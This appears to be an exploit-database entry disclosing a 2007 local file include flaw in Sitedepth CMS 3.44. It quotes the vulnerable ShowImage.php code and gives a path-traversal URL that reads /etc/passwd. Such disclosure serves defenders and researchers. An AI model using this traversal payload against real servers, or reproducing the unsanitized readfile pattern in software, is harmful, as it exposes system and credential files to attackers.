Sitedepth CMS 3.44 Local File Include LFI Exploit

vendor:

Sitedepth CMS

by:

H4 / Team XPK

7.5

CVSS

HIGH

Local File Include (LFI)

CWE

Product Name: Sitedepth CMS

Affected Version From: Sitedepth CMS 3.44

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Sitedepth CMS 3.44 Local File Include LFI Exploit

The Sitedepth CMS version 3.44 has a Local File Include vulnerability in the ShowImage.php file. This vulnerability allows an attacker to include arbitrary files from the server, potentially leading to remote code execution.

Mitigation:

The vendor has not provided a patch for this vulnerability. It is recommended to upgrade to a newer version of the CMS or implement proper input validation to prevent LFI attacks.

Source

Exploit-DB raw data:

__________________________________________________________________________

[*] Sitedepth CMS 3.44 Local File Include LFI Exploit       
__________________________________________________________________________

[!] Application homepage :   http://www.sitedepth.com/
[!] Author               :   H4 / Team XPK 
[!] Contact              :   H4_XPK@hotmail.com
[!] Bug discovered       :   2006-11-07
[!] Bug published        :   2007-06-25

---------------------------------------------------------------------

Vuln. code: ShowImage.php


<?php

  include 'sitedepth.php';
  $content_type = 'image/jpeg';
  $filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];
  $filename_show = $_GET['name'];
  header ('Content-type: ' . $content_type);
  header ('Content-Disposition: inline;    filename=' . $filename_show);
  readfile ($filename);   <-------------- BAD!   
?>

---------------------------------------------------------------------

[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd

---------------------------------------------------------------------

[!] Sometimes it`s time to give instead of taking :)

[!] Greetz to Angeldust & Streets and to rest of community.

# milw0rm.com [2007-06-25]